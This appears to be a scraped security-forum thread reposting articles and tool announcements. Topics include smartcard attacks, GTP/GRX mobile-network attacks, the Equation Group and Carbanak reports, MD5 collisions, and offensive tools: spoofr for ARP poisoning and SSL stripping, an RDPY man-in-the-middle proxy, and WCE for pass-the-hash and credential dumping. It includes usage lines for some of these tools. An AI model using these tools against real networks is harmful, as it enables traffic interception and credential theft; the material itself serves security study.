  5. Introduction to Smartcard Security Introduction In 1968 and 1969, the smartcard was patented in German by Helmut Gröttrup and Jürgen Dethloff. The smartcard is simply a card with an Integrated Circuit that could be programmed. This technology has been used widely in our daily lives and will become one of the important keys in Internet of Things (IoT) and Machine to Machine (M2M) technology. Smartcard applications could be programmed using Java Card, an open platform from Sun Microsystems. Today, we find smartcard technology mostly used in communications (GSM/CDMA Sim Card) and payments (credit/debit card). This is an example of smartcard technology that has been used in Indonesia: Picture 1. EMVd ebit card. Picture 2. Bolt 4G card. Smartcard Architecture Picture 3. Smartcard architecture (image courtesy of THC) How Does the Smartcard Work? 1. Smartcard Activation In order to interact with the smartcard that has been connected to a smartcard terminal, it should be activated using electrical signals according to smartcard specification class A, B, or C (ISO/IEC 7816-3). The activation sequence goes like this: RST pin should be put to LOW state. Vcc pin should be powered. I/O pin on the smartcard terminal should be put to receive mode, even though it could ignore the I/O logic while smartcard activation takes place. CLK pin should provide clock signal to the smartcard. More detailed information about this smartcard activation (before timing Ta) can be seen in this picture: Picture 4. Smartcard activation and cold reset. 2. Cold Reset At the end of activation (RST pin pulled to LOW, Vcc pin has been powered, I/O on smartcard terminal has been put to receive mode and CLK pin supplied a stable clock signal), then the smartcard is ready to enter Cold Reset. As you can see from the above picture, the clock signal at the CLK pin starts at Ta and the smartcard will set the I/O signal to HIGH in 200 clock cycle (ta delay) after the clock signal is applied to CLK pin (Ta + ta). The RST pin should be kept in LOW state for at least 400 clock cycles (tb delay) after clock signal has been given to CLK pin (Ta + tb). The smartcard terminal could ignore the logic in I/O pin when RST pin is on LOW state. RST pin then change to HIGH state after reaching Tb. I/O pin will begin the Answer-to-Reset from 400 to 40000 clock cycle (tc delay) after rising edge signal in RST pin (Tb + tc). If there is no answer after the 40000 clock cycle when the RST pin is in HIGH state, then the smartcard terminal could deactivate the smartcard. 3. Smartcard ATR (Answer-to-Reset) After the smartcard performs a cold reset, then it will continue with Answer-to-Reset (ATR). The complete ATR structure is covered in ISO/IEC 7816-3, and it looks like this: TS T0 TA1 TB1 TC1 TD1 TA2 … … TDn T1 … TK TCK For example, this is the Answer-to-Reset that we receive after performing a cold reset on a smartcard: 3B BE 94 00 40 14 47 47 33 53 33 44 48 41 54 4C 39 31 30 30 After receiving the ATR above, we then continue with interpreting the data as follows: TS = 3B It means that the smartcard operates using direct convention that works almost like UART protocol. The direct convention operation was covered in ISO/IEC 7816-3. T0 = BE (1011 11102) – High nibble (B16 = 10112) means that there is a data on TA1, TB1, dan TD1. – Low nibble (E16 = 1410) means that there is 14 bytes of history data (TK). TA1 = 94 (1001 01002) – High nibble (916 = 10012) means that the clock rate is Fi = 512 with fmax = 5 MHz. – Low nibble (416 = 01002) means that bit rate Di = 8. TB1 = 00 According to ISO/IEC 7816-3, the TB1 and TB2 has been deprecated and not used anymore so the smartcard doesn’t have to transmit it and the smartcard terminal could just ignore it. TD1 = 40 (0100 00002) – High nibble (416 = 01002) means that TC2 contains data. – Low nibble (016 = 00002) means that the smartcard is using T = 0 protocol. TC2 = 14 (2010) This is the Waiting Time Integer (WI) with a value of 20. From the ISO/IEC 7816-3, the value could be used to calculate Waiting Time (WT) with this formula: History bytes = 47 47 33 53 33 44 48 41 54 4C 39 31 30 30 This could be converted to ASCII : G G 3 S 3 D H A T L 9 1 0 0 4. Protocol and Parameter Selection Interface (PPS) After getting Answer-to-Reset (ATR), the smartcard interface then could send PPS instruction to choose which protocol and parameter it would use to make data transfer between the smartcard and the terminal easier. 5. Data Transfer Between Smartcard and Terminal After the Protocol and Parameter Selection (PPS) has been setup, the smartcard and the terminal interface could begin transferring data using Application Protocol Data Unit (APDU). The complete structure for APDU is covered in ISO 7816-4. Vulnerabilities There are quite a lot of vulnerabilities related to the java card, and most of them have been documented across the Internet. This is some of the smartcard’s attack vector: 1. Physical attack: Reverse engineering. Smartcard cloning. 2. Remote attack: IMSI catcher. Attacking a Smartcard 1. Physical Attack Physical attack could be carried out if the attacker has physical contact with victim’s smartcard and gets access to important data on the smartcard. Once the attacker has access to that important data, he/she could perform a smartcard cloning or reprogramming of the smartcard. 1.1. Reverse Engineering Picture 5. Typical smartcard front side. Picture 6. Typical smartcard back side. Picture 7. Smartcard IC “die” Reverse engineering smartcard at silicon level is not an easy task and requires some special tools such as Scanning Electron Microscope (SEM) and/or Focused Ion Beam (FIB). 1.2. Smartcard Cloning For this purpose, an attacker could use a couple of devices like an oscilloscope and smartcard reader. This is an example of DIY smartcard reader (phoenix reader): Picture 8. DIY smartcard reader (phoenix reader). However, there’s a catch for the phoenix reader like the one in the above picture – its lack of application for interfacing with smartcard. The reference schematic for phoenix reader used in the above picture was developed by Dejan Kaljevic and is freely available. Picture 9. Phoenix reader schematic. Smartcard cloning is not just about programming the smartcard, but also retrieving important information about the victim’s smartcard such as which vendor issued the card. The more convenient way to interact with the smartcard is by using PCSC reader with an opensource application called pcsc_scan. This is an example of pcsc_scan usage: Picture 10. Information retrieved from smartcard payment. Picture 11. Information from 3G/4G smartcard. As you may see in the picture above, we could get some information from the smartcard attached to the terminal. Picture 10 shows a smartcard that’s commonly used in a financial institution which complies with the EMV standard, and picture 11 shows a smartcard (USIM) that’s commonly used for communication (3G/4G). That information could be used to determine what kind of encryption the smartcard uses, since vendors tends to follow standard specs and not use custom encryption. Attackers could then use the information to perform a remote attack. 2. Remote Attack Remote attacking smartcard could be achieved by exploiting vulnerabilities in the smartcard. For example; by injecting malicious “binary sms”. 2.1. IMSI Catcher The cost for this kind of attack is quite high, since the attacker must have some kind of hardware that could run OpenBTS and work as a fake BTS. In order to become a fake BTS, that hardware should generate a stronger signals than the real BTS to force the victim’s terminal (i.e mobile phone) to connect to the fake BTS. Picture 12. Fake BTS (IMSI catcher) illustration. After the victim’s mobile phone is connected to the fake BTS, the attacker then could send a payload using the Over-the-Air (OTA) method that is common for GSM networks and direct the payload to the smartcard inside the mobile phone. Conclusion From the explanation above, we can conclude that an attacker who could exploit a vulnerability on smartcard would result in a catastrophic event, especially if it’s related to a critical infrastructure, such as a SCADA installation that utilizes GSM networks or financial institution that utilize GSM networks for their mobile banking. In order to prevent such an attack on a smartcard, vendors could implement some protection, such as developing custom EEPROM for java card. References ISO/IEC 7816. (ISO/IEC 7816 - Wikipedia, the free encyclopedia) Java Card. (Java Card - Wikipedia, the free encyclopedia) Java Card Technology from Oracle. (http://www.oracle.com/technetwork/java/embedded/javacard/overview/index-jsp-140503.html) ETSI TS 100 977, TS 101 267, TS 102 221, TS 102 223, EN 302 409. Author Tri Sumarno Sursa: Introduction to Smartcard Security - InfoSec Institute
  6. Nytro

    Cmd.fm

    Command line https://cmd.fm/
  7. Nytro

    spoofr

    spoofr spoofr - ARP poison and sniff with DNS spoofing, urlsnarf, driftnet, ferret, dsniff, sslstrip and tcpdump. Usage: spoofr -t <target> -s (break SSL) [in any order] -t - Target IP address extension -s - Break ssl -h - This help Example: spoofr -t 100 -s -Attack $ENET"100" and break SSL Sursa: https://github.com/d4rkcat/Spoofr
  8. Create your own MD5 collisions A while ago a lot of people visited my site (~ 90,000 ) with a post about how easy it is to make two images with same MD5 by using a chosen prefix collision. I used Marc Steven'sHashClash on AWS and estimated the the cost of around $0.65 per collision. Given the level of interest I expected to see cool MD5 collisions popping up all over the place. Possibly it was enough for most people to know it can be done quite easily and cheaply but also I may have missed out enough details in my original post. In this further post I’ve made an AWS image available and created a step-by-step guide so that you too can create MD5 chosen prefix collisions and amuse your friends (disclaimer: they not be that amused). All you need to do is create an AWS instance and run a few commands from the command line. There is a explanation of how the chosen prefix collision works in Marc Steven's Masters thesis. Here are the steps to create a collision. 1) Log on to AWS console and create a spot request for an instance based on my public Amazon Machine Image (AMI). Spot requests are much cheaper than creating instances directly, typically $0.065 an hour. They can be destroyed, losing your data, if the price spikes but for fun projects they are the way to go. I have created a public AMI called hash-clash-demo. It has the id ami-dc93d3b4 and is in the US East (North Virginia) region. It has all the software necessary to create a collision pre-built. Search for it with ami-dc93d3b4 in community AMIs and then choose a GPU2 instance. I promise it does not mine bitcoins in the background although thinking about it this would be a good scam and I may introduce this functionality. 2) Once your request has been created and evaluated hopefully you will have a running instance to connect to via SSH. You may need to create a new key pair, follow the instructions on AWS to do this and install on your local machine. Once you have your key installed log onto instance via ssh as ec2-user. 3) The shell script for running hash clash is located at /home/ec2-user/hashclash/src/scripts . Change into that directory and download some data to create a collision. Here I download a couple of jpeg images from tumblr. 4) It is best to run the shell script in a screen session so you can detach from it and do other stuff. Start a screen session by typing screen Once you are in the screen session kick off the cpc.sh shell script with your two files. Send the outputs to a log file in this case I called it demo.output. Detach from the screen session with Ctrl A + D 5) Tailing the log file you should be ale to see the birthday attack to get the hash differences into the correct locations starting. tail -f demo.output 6) Leave the birthday search to do it's thing for an hour or so. Hopefully when you come back the attack should have moved on to the next stage, creating the near collision blocks to gradually reduce the hash differences. The best way to check this is to look at files created. The workdir0 contains all the data for the current collision search for the first near collision block. More of these will be created as more near collision blocks are created. 7) Go away again, a watched collision pretty much never happens. Check back in ~5 hours that it is still going on. Tailing demo.output and listing the directory should let you know roughly what stage the attack is at. Here we are only at block number 2 of probably 9. 8) Come back again about 10-12 hours from start and with any luck we have a collision. This one finished at 02:45 in the morning having been started at 10:30 the previous morning. You can tell when it finished as that was the last point the log was written to. If the log log file is still being updated the collision search is still going on. It took 9 near collision blocks to finally eliminate all the differences which is normal. 16 hours is a bit longer than average. The collisions have been created in files named plane.jpg.coll and ship.jpg.coll. You can verify they do indeed have the same md5 hash with md5sum. Here are the images with collision blocks added. I downloaded them to my local machine with scp Posted by Nathaniel McHugh at 2:01 PM Sursa: http://natmchugh.blogspot.co.uk/2015/02/create-your-own-md5-collisions.html
  9. NSA: https://twitter.com/NSA_PR/status/567554102284935169
  10. The research: Mobile Internet traffic hijacking via GTP and GRX Most users assume that mobile network access is much safer because a big mobile-telecoms provider will protect subscribers. Unfortunately, as practice shows, mobile Internet is a great opportunity for the attacker. Positive Technologies experts have detected vulnerabilities in the infrastructure of mobile networks, allowing an attacker to intercept unencrypted GPRS traffic, spoof the data, block the Internet access, and determine the subscriber's location. Not only cell phones are exposed to threats, but also special devices connected to 2G/3G/4G networks via modems: ATM machines and payment terminals, remote transport and industrial equipment control systems, telemetry and monitoring tools, etc. Operators of mobile services usually encrypt GPRS traffic between the mobile terminal (smartphone, modem) and the Serving GPRS Support Node (SGSN) using GEA-1/2/3 encryption algorithms, making it difficult to intercept and decrypt information. In order to bypass this restriction an attacker can access the operator's basic network where the data is not protected by authentication mechanisms. Routing nodes (or gateway nodes) called GGSN are a weak point. We can easily find the required nodes using Shodan.io search engine for Internet-connected systems controlling industrial equipment. Vulnerable nodes have open GTP ports which allows attackers to set up the connection and then encapsulate GTP control packets into the created tunnel. If parameters were selected properly GGSN will take them as packets from legitimate devices within the operator's network. The described above GTP protocol in no way should be seen from the Internet. In practice, however, things are often quite different: There are more than 207,000 devices with open GTP ports all over the global Internet. More than five hundred of them are components of cellular network architecture and respond to the request for a connection. Another benefit for attackers is that GTP is not the only protocol used to manage the detected hosts. FTP, SSH, Web, etc. are also used for management purposes. An attacker can connect to the node of a mobile network operator by exploiting vulnerabilities (for example, default passwords) in these interfaces. Experimental search through the Shodan site reveals some vulnerable devices, including ones with open Telnet and turned off password authentication. An attacker can perform an intrusion into the network of the operator in the Central African Republic by connecting to this device and implementing the required settings. Having access to the network of any operator, the attacker will automatically get access to the GRX network and other operators of mobile services. One single mistake made by one single operator in the world creates this opportunity for attack to many other mobile networks. Among the various ways of using the compromised boundary host we should note the following: disconnection of subscribers from the Internet or blocking their access to the Internet; connecting to the Internet with the credentials of a legitimate user and at the expense of others; listening to the traffic of the victim and fishing attacks. An attacker can also get the subscriber's ID (IMSI) and monitor the subscriber's location worldwide until the SIM card is changed. Let us describe in more detail some of the security threats. Internet at the expense of others Goal. The exhaustion of the subscriber's account and use of the connection for illegal purposes. Attack vector: An attacker conducts attacks from the GRX network or the operator's network. Description. The attack is based on sending the “Create PDP context request” packets with the IMSI of a subscriber known in advance. Thus, the subscriber's credentials are used to establish connection. Unsuspecting subscriber will get a huge bill. It is possible to establish connection via the IMSI of a non-existent subscriber, as subscriber authorization is performed at the stage of connecting to SGSN and GGSN receives already verified connections. Since the SGSN is compromised, no verification is carried out. Result. An attacker can connect to the Internet with the credentials of a legitimate user. Data interception Goal. To listen to the traffic of the victim and conduct a fishing attack. Attack vector: An attacker conducts attacks from the GRX network or the operator's network. Description. An attacker can intercept data sent between the subscriber's device and the Internet by sending an “Update PDP Context Request” message with spoofed GSN addresses to SGSN and GGSN. This attack is an analogue of the ARP Spoofing attack at the GTP level. Result. Listening to traffic or spoofing traffic from the victim and disclosure of sensitive data. DNS tunneling Goal. To get non-paid access to the Internet from the subscriber's mobile station. Attack vector: The attacker is the subscriber of a mobile phone network and acts through a mobile phone. Description. This is a well-known attack vector, rooted in the days of dial-up, but the implementation of low-price and fast dedicated Internet access made it less viable. However, this attack can be used in mobile networks, for example, in roaming when prices for mobile Internet are unreasonably high and the data transfer speed is not that important (for example, for checking email). The point of this attack is that some operators do not rate DNS traffic, usually in order to redirect the subscriber to the operator's webpage for charging the balance. An attacker can use this vulnerability by sending special crafted requests to the DNS server; to get access one needs a specialized host on the Internet. Result. Getting non-paid access to the Internet at the expense of mobile operator. Substitution of DNS for GGSN Goal. To listen to the traffic of the victim and conduct a fishing attack. Attack vector: An attacker acts through the Internet. Description. If an attacker gets access to GGSN (which is quite possible as we could see), the DNS address can be spoofed with the attacker's address and all the subscriber's traffic will be redirected through the attacker's host. Thus, listening to all the mobile traffic of the subscriber is possible. Result. An ability to listen to traffic or spoof traffic from all subscribers and then gather confidential data to engage it in fishing attacks. Some of the attacks can not be performed if the equipment is configured properly. Still the results of the research made by Positive Technologies suggest that misconfiguration is a common problem in the telecommunications sphere. Vendors often leave some services enabled while these services should be disabled on this equipment, which gives additional opportunities to attackers. Due to the large number of nodes it is recommended to automate the control process using specific tools such as MaxPatrol. How to Protect Yourself Security measures required to protect against such attacks include proper configuration of equipment, utilizing firewalls at the GRX network edge, using 3GPP TS 33.210 recommendations to configure the security settings within the PS Core network, security monitoring of the perimeter as well as developing security compliances for the equipment and performing regular compliance management tasks. Many people rely on new communication standards that include new safety technologies. However, despite the development of such standards (3G, 4G) we cannot completely abandon the use of old generation networks (2G). The reason is the specifics of the implementation of mobile networks and the fact that the 2G base stations have better coverage as well as the fact that 3G networks use their infrastructure. LTE still uses the GTP protocol and therefore the necessary protection measures will be relevant in the foreseeable future. The results of this research were gathered by Positive Technologies experts in 2013 and 2014 during consulting on security analysis for several large mobile operators. For detailed report on Vulnerabilities of mobile Internet (GPRS), please visit Positive Technologies official site: www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf ?????: Positive Research ?? 12:54 AM Sursa: http://blog.ptsecurity.com/2015/02/the-research-mobile-internet-traffic.html
  11. VULNERABILITIES OF MOBILE INTERNET (GPRS) Dmitry Kurbatov Sergey Puzankov Pavel Novikov 2014 Contents 1. Introduction 2. Summary 3. M obile network scheme 4. GTP protocol 5. Searching for mobile operator’s facilities on the Internet 6. Threats 6.1. IMSI brute force 6.2. T he disclosure of subscriber’s data via IMSI 6.3. Dis connection of authorized subscribers from the Internet 6.4. B locking the connection to the Internet 6.5. Internet at the expense of others 6.6. D ata interception 6.7. DN S tunneling 6.8. Substitution of DNS for GGSN 7. C onclusion and recommendations Download: http://www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf
  12. iSpy Assessment Framework iSpy aims to be your one-stop-shop for reverse engineering and dynamic analysis of iOS applications. Current Release The current release is a developer preview; code is subject to change, and will be unstable. However, we appreciate code contributions, feature requests, and bug reports. We currently do not have binary releases, stay tuned! Instructions Compiling and Installing iSpy Injecting iSpy into Apps Features Easy to use Web GUI Class dumps Instance tracking Automatic jailbreak-detection bypasses Automatic SSL certificate pinning bypasses Re-implemented objc_msgSend for logging and tracing function calls in realtime Cycript integration; access Cycript from your browser! Anti-anti-method swizzling Automatic detection of vulnerable function calls Easy to use soft-breakpoints More on the way! Sursa: https://github.com/BishopFox/iSpy
  13. Big-brand hard disk firmware worldwide RIDDLED with NSA SPY KIT Kaspersky: 'Equation Group' attacked 'high value targets' 17 Feb 2015 at 01:57, Darren Pauli America's National Security Agency (NSA) has infected hard disk firmware with spyware in a campaign valued as highly as Stuxnet and dating back at least 14 years, and possibly up to two decades, according to an analysis by Kaspersky labs and subsequent reports. The campaign infected possibly tens of thousands of computers in telecommunications providers, governments, militaries, utilities, and mass media organisations among others in more than 30 countries. The agency is said to have compromised hard drive firmware for more than a dozen top brands, including Seagate, Western Digital, IBM, Toshiba, Samsung and Maxtor, Kaspersky researchers revealed. Reuters reports sources formerly working with the NSA confirmed the agency was responsible for the attacks, which Kaspersky doesn't lay at the feet of the agency. Kaspersky's analysis says the NSA made a breakthrough by infecting hard disk firmware with malware known only as nls_933w.dll capable of persisting across machine wipes to re-infect targeted systems. Researchers said the actors dubbed 'The Equation Group' had access to the firmware source code and flexed their full remote access control over infected machines only for high value targets. "The Equation group is probably one of the most sophisticated cyber attack groups in the world," Kaspersky bods said in an advisory. "This is an astonishing technical accomplishment and is testament to the group's abilities." "For many years they have interacted with other powerful groups, such as the Stuxnet and Flame groups; always from a position of superiority, as they had access to exploits earlier than the others." It called the campaign the "Death Star" of the malware universe, and said (PDF) the Equation moniker was given based on the attackers' "love for encryption algorithms and obfuscation strategies". Reuters sources at the NSA said the agency would sometimes pose as software developers to trick manufacturers into supplying source code, or could simply keep a copy of the data when the agency did official code audits on behalf of the Pentagon. Western Digital said it did not share source code with the agency. It was unknown if other named hard drive manufacturers had done so. Vectors The agency spread its spy tools through compromised watering hole jihadist sites and by intercepting and infecting removal media including CDs. The latter vector was discovered in 2009 when a scientist named Grzegorz Brzeczyszczykiewicz received a CD sent by a unnamed prestigious international scientific conference he had just attended in Houston. Kaspersky said that CD contained three exploits, of which two were zero day, sent by the "almost omnipotent" attack group. Another method included a custom malware dubbed Fanny which used two zero day flaws identical to those executed later in Stuxnet. Its main purpose, Kaspersky's researchers said, was to map air-gap networks using a unique USB-based command and control mechanism which could pass data back and forth from air-gapped networks. This researchers said indicated the authors worked in collaboration with those behind the Natanz uranium plant weapon and further shored-up claims the NSA was behind the detailed attacks. Other trojans used in the prolonged and wipe spread attacks were dubbed Equationlaser; Equationdrug; Doublefantasy; Triplefantasy, and Grayfish. It detailed the trojans in a document: EQUATIONDRUG – A very complex attack platform used by the group on its victims. It supports a module plugin system, which can be dynamically uploaded and unloaded by the attackers. DOUBLEFANTASY – A validator-style Trojan, designed to confirm the target is the intended one. If the target is confirmed, they get upgraded to a moresophisticated platform such as EQUATIONDRUG or GRAYFISH. EQUESTRE – Same as EQUATIONDRUG. TRIPLEFANTASY – Full-featured backdoor sometimes used in tandem with GRAYFISH. Looks like an upgrade of DOUBLEFANTASY, and is possibly a more recent validator-style plugin. GRAYFISH – The most sophisticated attack platform from the EQUATION Group. It resides completely in the registry, relying on a bootkit to gain execution at OS startup. FANNY – A computer worm created in 2008 and used to gather information about targets in the Middle East and Asia. Some victims appear to have been upgraded first to DoubleFantasy, and then to the EQUATIONDRUG system. Fanny used exploits for two zero-day vulnerabilities which were later discovered with Stuxnet. EQUATIONLASER – An early implant from the EQUATION group, used around2001-2004. Compatible with Windows 95/98, and created sometime between DOUBLEFANTASY and EQUATIONDRUG. Kaspersky has include indicators of compromise for the malware strains and will publish an update in coming days, it said. ® Sursa: http://www.theregister.co.uk/2015/02/17/kaspersky_labs_equation_group/
  14. CARBANAK APTTHE GREAT BANK ROBBERY By Kaspersky Table of contents1. Executive Summary...........................................3 2. Analysis...................................................5 2.1 Infection and Transmission.............................5 2.2 Malware Analysis – Backdoor.Win32.Carbanak...........7 2.3 Lateral movement tools............ 18 2.4 Command and Control (C2) Servers........... 19 3. Conclusions.................................................23 APPENDIX 1: C2 protocol decoders................. 24 APPENDIX 2: BAT file to detect infection.............. 27 APPENDIX 3: IOC hosts.............. 28 APPENDIX 4: Spear phishing................. 34 APPENDIX 5: MD5 hashes of Carbanak samples............36 Download: https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  15. RDPY Remote Desktop Protocol in twisted python. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY provides the following RDP and VNC binaries : RDP Man In The Middle proxy which record session RDP Honeypot RDP screenshoter RDP client VNC client VNC screenshoter RSS Player Build RDPY is fully implemented in python, except the bitmap decompression algorithm which is implemented in C for performance purposes. Dependencies Dependencies are only needed for pyqt4 binaries : rdpy-rdpclient rdpy-rdpscreenshot rdpy-vncclient rdpy-vncscreenshot rdpy-rssplayer Linux Example for Debian based systems : sudo apt-get install python-qt4 Windows [TABLE=width: 728] [TR] [TH]x86[/TH] [TH]x86_64[/TH] [/TR] [TR] [TD]PyQt4[/TD] [TD]PyQt4[/TD] [/TR] [TR=bgcolor: #F8F8F8] [TD]PyWin32[/TD] [TD]PyWin32[/TD] [/TR] [/TABLE] Build $ git clone https://github.com/citronneur/rdpy.git rdpy $ pip install twisted pyopenssl qt4reactor service_identity rsa $ python rdpy/setup.py install Or use PIP: $ pip install rdpy For virtualenv, you will need to link the qt4 library to it: $ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/ $ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/ RDPY Binaries RDPY comes with some very useful binaries. These binaries are linux and windows compatible. rdpy-rdpclient rdpy-rdpclient is a simple RDP Qt4 client. $ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389] You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot. rdpy-vncclient rdpy-vncclient is a simple VNC Qt4 client . $ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900] rdpy-rdpscreenshot rdpy-rdpscreenshot saves login screen in file. $ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389] rdpy-vncscreenshot rdpy-vncscreenshot saves the first screen update in file. $ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900] rdpy-rdpmitm rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer. $ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port] Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. The CredSSP security layer is planned for an upcoming release. If one of both parameters are omitted, the server use standard RDP as security layer. rdpy-rdphoneypot rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol. $ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. The CredSSP security layer is planned for an upcoming release. If one of both parameters are omitted, the server use standard RDP as security layer. You can specify more than one files to match more common screen size. rdpy-rssplayer rdpy-rssplayer is use to replay Record Session Scenario (rss) files generates by either rdpy-rdpmitm or rdpy-rdpclient binaries. $ rdpy-rssplayer.py rss_file_path RDPY Qt Widget RDPY can also be used as Qt widget through rdpy.ui.qt4.QRemoteDesktop class. It can be embedded in your own Qt application. qt4reactor must be used in your app for Twisted and Qt to work together. For more details, see sources of rdpy-rdpclient. RDPY library In a nutshell RDPY can be used as a protocol library with a twisted engine. Simple RDP Client [FONT=Helvetica Neue]from rdpy.protocol.rdp import rdp class MyRDPFactory(rdp.ClientFactory): def clientConnectionLost(self, connector, reason): reactor.stop() def clientConnectionFailed(self, connector, reason): reactor.stop() def buildObserver(self, controller, addr): class MyObserver(rdp.RDPClientObserver) def onReady(self): """ @summary: Call when stack is ready """ #send 'r' key self._controller.sendKeyEventUnicode(ord(unicode("r".toUtf8(), encoding="UTF-8")), True) #mouse move and click at pixel 200x200 self._controller.sendPointerEvent(200, 200, 1, true) def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data): """ @summary: Notify bitmap update @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destLeft: xmin position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destTop: ymin position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destRight: xmax position because RDP can send bitmap with padding @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m destBottom: ymax position because RDP can send bitmap with padding @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m width: width of bitmap @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m height: height of bitmap @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m bitsPerPixel: number of bit per pixel @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isCompress: use RLE compression @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m data: bitmap data """ def onClose(self): """ @summary: Call when stack is close """ return MyObserver(controller) from twisted.internet import reactor reactor.connectTCP("XXX.XXX.XXX.XXX", 3389), MyRDPFactory()) reactor.run()[/FONT] Simple RDP Server [FONT=Helvetica Neue]from rdpy.protocol.rdp import rdp class MyRDPFactory(rdp.ServerFactory): def buildObserver(self, controller, addr): class MyObserver(rdp.RDPServerObserver) def onReady(self): """ @summary: Call when server is ready to send and receive messages """ def onKeyEventScancode(self, code, isPressed): """ @summary: Event call when a keyboard event is catch in scan code format @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m code: scan code of key @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isPressed: True if key is down @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onKeyEventScancode """ def onKeyEventUnicode(self, code, isPressed): """ @summary: Event call when a keyboard event is catch in unicode format @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m code: unicode of key @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isPressed: True if key is down @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onKeyEventUnicode """ def onPointerEvent(self, x, y, button, isPressed): """ @summary: Event call on mouse event @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m x: x position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m y: y position @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m button: 1, 2 or 3 button @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m isPressed: True if mouse button is pressed @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onPointerEvent """ def onClose(self): """ @summary: Call when human client close connection @[URL="https://rstforums.com/forum/members/see/"]see[/URL]: rdp.RDPServerObserver.onClose """ return MyObserver(controller) from twisted.internet import reactor reactor.listenTCP(3389, MyRDPFactory()) reactor.run()[/FONT] Simple VNC Client [FONT=Helvetica Neue]from rdpy.protocol.rfb import rfb class MyRFBFactory(rfb.ClientFactory): def clientConnectionLost(self, connector, reason): reactor.stop() def clientConnectionFailed(self, connector, reason): reactor.stop() def buildObserver(self, controller, addr): class MyObserver(rfb.RFBClientObserver) def onReady(self): """ @summary: Event when network stack is ready to receive or send event """ def onUpdate(self, width, height, x, y, pixelFormat, encoding, data): """ @summary: Implement RFBClientObserver interface @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m width: width of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m height: height of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m x: x position of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m y: y position of new image @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m pixelFormat: pixefFormat structure in rfb.message.PixelFormat @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m encoding: encoding type rfb.message.Encoding @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m data: image data in accordance with pixel format and encoding """ def onCutText(self, text): """ @summary: event when server send cut text event @[URL="https://rstforums.com/forum/members/para/"]Para[/URL]m text: text received """ def onBell(self): """ @summary: event when server send biiip """ def onClose(self): """ @summary: Call when stack is close """ return MyObserver(controller) from twisted.internet import reactor reactor.connectTCP("XXX.XXX.XXX.XXX", 3389), MyRFBFactory()) reactor.run()[/FONT] Sursa: https://github.com/citronneur/rdpy
  16. Windows Credentials Editor (WCE) – List, Add & Change Logon Sessions Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8. Features Perform Pass-the-Hash on Windows ‘Steal’ NTLM credentials from memory (with and without code injection) ‘Steal’ Kerberos Tickets from Windows machines Use the ‘stolen’ kerberos Tickets on other Windows or Unix machines to gain access to systems and services Dump cleartext passwords stored by Windows authentication packages WCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to ‘steal’ and reuse NTLM hashes, Kerberos tickets and plaintext passwords which can then be used to compromise other machines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after compromising only one server or workstation. You can download WCE here: WCE v1.42beta (32-bit) WCE v1.42beta (64-bit) Or read more here. Sursa: 